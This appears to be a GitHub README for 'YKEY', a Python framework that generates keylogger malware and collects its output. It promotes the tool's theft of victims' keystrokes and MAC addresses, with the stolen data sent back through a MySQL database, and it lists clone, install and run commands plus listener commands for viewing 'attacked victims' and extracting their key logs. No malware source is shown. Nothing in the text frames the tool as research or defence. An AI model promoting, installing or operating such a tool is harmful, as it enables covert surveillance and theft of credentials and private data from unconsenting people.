
This is a small framework for generate and listen to Keylogger malwares... And also the most effective and most useful feature about this Keylogger malwares is they don't communicate through email with the hackers. It uses a MYSQL databases to communicate. So you will not face to any email issues. Not only that but also using this framework you can have a log of your victims their mac addresses and also their key logs. You can connect back to a victims no matter what your routers dynamic public IP address is.

Primary LanguagePython

enter image description here


This is a small framework for generate and listen to Keylogger malwares... And also the most effective and most useful feature about this Keylogger malwares is they don't communicate through email with the hackers. It uses a MYSQL databases to communicate. So you will not face to any email issues. Not only that but also using this framework you can have a log of your victims their mac addresses and also their key logs. You can connect back to a victims no matter what your routers dynamic public IP address is.


  1. Installation of this framework is so simple. If you accidentally delete any file please clone the repository from the git hub then continue.
    git clone https://github.com/0301yasiru/YKEY_keylogger.git
    cd YKEY_keylogger
  2. Hence this entire program uses only python 3. you must install python 3 before installation.
  3. The run the command below to install the program
    python3 install.py
  4. And after that you can run the program without any issues. Run the command below to start the program
    python3 ykey.py
  5. You can view the help of the program using this command below
    python3 install.py --help
    python3 ykey.py --help
  6. To update the downloaded program go to the YKEY directory and run the command below.
    git pull

FIX misconfigurations

  1. To fix MySQL configuration run the command below
    python3 install.py --configure-mysql
  2. To fix virtual environment issues run the command below
    python3 install.py --configure-venv

Command Help

Universal commands (You can run these command from anywhere in the program

help		:Using this command you can view the help guide
exit/quit	:Using this command you can exit from the space or quit the program
clear		:Using this command you can clear the screen
options/show options : Using this command you can view options in the current work space

Malware Generation Commands (You can only run there commands when using generation option)

set	:SYNTAX --> set [option_name] [option_value]
	: Using this command you can change a setting of Malware
generate: Using this command you can generate the configured malwares

Malware Listener Commands (You can use these commands only when you using the listener option)[[reset]]

show victims : Using this command you can view your already attacked victims
extract      : Using this command you can pull out all the key logs recorded to your computer